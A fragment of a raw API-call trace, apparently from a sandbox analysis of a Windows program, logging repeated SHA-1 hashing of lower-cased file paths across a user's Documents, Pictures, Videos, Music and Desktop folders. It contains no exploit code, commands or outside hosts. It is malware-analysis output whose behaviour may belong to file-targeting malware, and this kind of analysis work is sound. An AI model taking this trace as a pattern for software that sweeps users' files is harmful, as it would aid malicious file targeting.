_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/M_VJrQ.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/m_vjrq.wav") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/m_vjrq.wav" [0067.336] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/m_vjrq.wav") returned 0x45 [0067.336] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0067.336] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.337] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/m_vjrq.wav") returned 0x45 [0067.337] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/m_vjrq.wav/") returned 0x46 [0067.337] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.337] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.337] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.337] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/uV0JJ-adg03M4.ppt") returned 0x43 [0067.337] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/uV0JJ-adg03M4.ppt" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/uv0jj-adg03m4.ppt") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/uv0jj-adg03m4.ppt" [0067.337] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/uv0jj-adg03m4.ppt") returned 0x43 [0067.337] CryptHashData (hHash=0x65edc8, pbData=0x198270, dwDataLen=0x88, dwFlags=0x0) returned 1 [0067.337] CryptGetHashParam (in: hHash=0x65edc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.337] CryptDestroyHash (hHash=0x65edc8) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/uv0jj-adg03m4.ppt") returned 0x43 [0067.337] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/uv0jj-adg03m4.ppt/") returned 0x44 [0067.337] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0067.337] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.337] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.337] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/TsBOnlpvMwfzlXtAUH.png") returned 0x56 [0067.337] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/TsBOnlpvMwfzlXtAUH.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/tsbonlpvmwfzlxtauh.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/tsbonlpvmwfzlxtauh.png" [0067.337] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/tsbonlpvmwfzlxtauh.png") returned 0x56 [0067.337] CryptHashData (hHash=0x65ecc8, pbData=0x198270, dwDataLen=0xae, dwFlags=0x0) returned 1 [0067.337] CryptGetHashParam (in: hHash=0x65ecc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.337] CryptDestroyHash (hHash=0x65ecc8) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/tsbonlpvmwfzlxtauh.png") returned 0x56 [0067.337] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/tsbonlpvmwfzlxtauh.png/") returned 0x57 [0067.337] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xb0, dwFlags=0x0) returned 1 [0067.337] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.337] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.337] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f") returned 0x41 [0067.337] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f" [0067.337] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f") returned 0x41 [0067.337] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x84, dwFlags=0x0) returned 1 [0067.337] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.337] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f") returned 0x41 [0067.337] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.337] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/") returned 0x42 [0067.337] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x86, dwFlags=0x0) returned 1 [0067.337] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.337] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.337] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E") returned 0x52 [0067.337] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e" [0067.337] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e") returned 0x52 [0067.338] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0xa6, dwFlags=0x0) returned 1 [0067.338] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.338] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e") returned 0x52 [0067.338] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/") returned 0x53 [0067.338] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xa8, dwFlags=0x0) returned 1 [0067.338] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.338] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.338] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/20eRJkLmPumj7Tt7Ey.flv") returned 0x3b [0067.338] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/20eRJkLmPumj7Tt7Ey.flv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/20erjklmpumj7tt7ey.flv") returned="file:///c:/users/ciihmnxmn6ps/videos/20erjklmpumj7tt7ey.flv" [0067.338] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/20erjklmpumj7tt7ey.flv") returned 0x3b [0067.338] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x78, dwFlags=0x0) returned 1 [0067.338] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.338] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/20erjklmpumj7tt7ey.flv") returned 0x3b [0067.338] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/20erjklmpumj7tt7ey.flv/") returned 0x3c [0067.338] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.338] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.338] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.338] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/1oJRAjQREh.bmp") returned 0x55 [0067.338] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/1oJRAjQREh.bmp" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/1ojrajqreh.bmp") returned="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/1ojrajqreh.bmp" [0067.338] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/1ojrajqreh.bmp") returned 0x55 [0067.338] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xac, dwFlags=0x0) returned 1 [0067.338] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.338] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/1ojrajqreh.bmp") returned 0x55 [0067.338] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/1ojrajqreh.bmp/") returned 0x56 [0067.338] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0xae, dwFlags=0x0) returned 1 [0067.338] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.338] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.338] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f/tiWSJMfu9FqeW3yje5.avi") returned 0x58 [0067.338] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f/tiWSJMfu9FqeW3yje5.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/tiwsjmfu9fqew3yje5.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/tiwsjmfu9fqew3yje5.avi" [0067.338] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/tiwsjmfu9fqew3yje5.avi") returned 0x58 [0067.338] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0xb2, dwFlags=0x0) returned 1 [0067.338] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.338] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/tiwsjmfu9fqew3yje5.avi") returned 0x58 [0067.338] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.338] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/tiwsjmfu9fqew3yje5.avi/") returned 0x59 [0067.338] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xb4, dwFlags=0x0) returned 1 [0067.338] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.339] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.339] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/L3fqI-4CUw3h.pps") returned 0x38 [0067.339] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/L3fqI-4CUw3h.pps" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/l3fqi-4cuw3h.pps") returned="file:///c:/users/ciihmnxmn6ps/documents/l3fqi-4cuw3h.pps" [0067.339] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/l3fqi-4cuw3h.pps") returned 0x38 [0067.339] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x72, dwFlags=0x0) returned 1 [0067.339] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.339] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/l3fqi-4cuw3h.pps") returned 0x38 [0067.339] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/l3fqi-4cuw3h.pps/") returned 0x39 [0067.339] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x74, dwFlags=0x0) returned 1 [0067.339] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.339] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.339] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/-0TXuLD8MdC1qZ.avi") returned 0x37 [0067.339] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/-0TXuLD8MdC1qZ.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/-0txuld8mdc1qz.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/-0txuld8mdc1qz.avi" [0067.339] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/-0txuld8mdc1qz.avi") returned 0x37 [0067.339] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x70, dwFlags=0x0) returned 1 [0067.339] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.339] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/-0txuld8mdc1qz.avi") returned 0x37 [0067.339] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/-0txuld8mdc1qz.avi/") returned 0x38 [0067.339] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x72, dwFlags=0x0) returned 1 [0067.339] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.339] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.339] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/L7WFyAob%20bWVwBYpNoe.gif") returned 0x3f [0067.339] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/L7WFyAob%20bWVwBYpNoe.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/l7wfyaob%20bwvwbypnoe.gif") returned="file:///c:/users/ciihmnxmn6ps/desktop/l7wfyaob%20bwvwbypnoe.gif" [0067.339] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/l7wfyaob%20bwvwbypnoe.gif") returned 0x3f [0067.339] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.339] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.339] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/l7wfyaob%20bwvwbypnoe.gif") returned 0x3f [0067.339] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/l7wfyaob%20bwvwbypnoe.gif/") returned 0x40 [0067.339] CryptHashData (hHash=0x65ed08, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.339] CryptGetHashParam (in: hHash=0x65ed08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.339] CryptDestroyHash (hHash=0x65ed08) returned 1 [0067.339] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/P_KHZ.m4a") returned 0x2f [0067.339] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/P_KHZ.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/p_khz.m4a") returned="file:///c:/users/ciihmnxmn6ps/desktop/p_khz.m4a" [0067.339] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.339] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/p_khz.m4a") returned 0x2f [0067.339] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x60, dwFlags=0x0) returned 1 [0067.339] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.339] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/p_khz.m4a") returned 0x2f [0067.340] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/p_khz.m4a/") returned 0x30 [0067.340] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x62, dwFlags=0x0) returned 1 [0067.340] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.340] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.340] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/8yDz7Ehy0Jd-N8YdBP.xls") returned 0x3e [0067.340] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/8yDz7Ehy0Jd-N8YdBP.xls" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/8ydz7ehy0jd-n8ydbp.xls") returned="file:///c:/users/ciihmnxmn6ps/documents/8ydz7ehy0jd-n8ydbp.xls" [0067.340] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/8ydz7ehy0jd-n8ydbp.xls") returned 0x3e [0067.340] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.340] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.340] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/8ydz7ehy0jd-n8ydbp.xls") returned 0x3e [0067.340] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/8ydz7ehy0jd-n8ydbp.xls/") returned 0x3f [0067.340] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.340] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.340] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.340] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/muy0dp6nu.docx") returned 0x36 [0067.340] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/muy0dp6nu.docx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/muy0dp6nu.docx") returned="file:///c:/users/ciihmnxmn6ps/documents/muy0dp6nu.docx" [0067.340] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/muy0dp6nu.docx") returned 0x36 [0067.340] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0067.340] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.340] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/muy0dp6nu.docx") returned 0x36 [0067.340] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/muy0dp6nu.docx/") returned 0x37 [0067.340] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x70, dwFlags=0x0) returned 1 [0067.340] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.340] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.340] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/x_IRzow.csv") returned 0x33 [0067.340] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/x_IRzow.csv" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/x_irzow.csv") returned="file:///c:/users/ciihmnxmn6ps/documents/x_irzow.csv" [0067.340] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/x_irzow.csv") returned 0x33 [0067.340] CryptHashData (hHash=0x65ed08, pbData=0x198270, dwDataLen=0x68, dwFlags=0x0) returned 1 [0067.340] CryptGetHashParam (in: hHash=0x65ed08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.340] CryptDestroyHash (hHash=0x65ed08) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/x_irzow.csv") returned 0x33 [0067.340] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/x_irzow.csv/") returned 0x34 [0067.340] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x6a, dwFlags=0x0) returned 1 [0067.340] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.340] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.340] 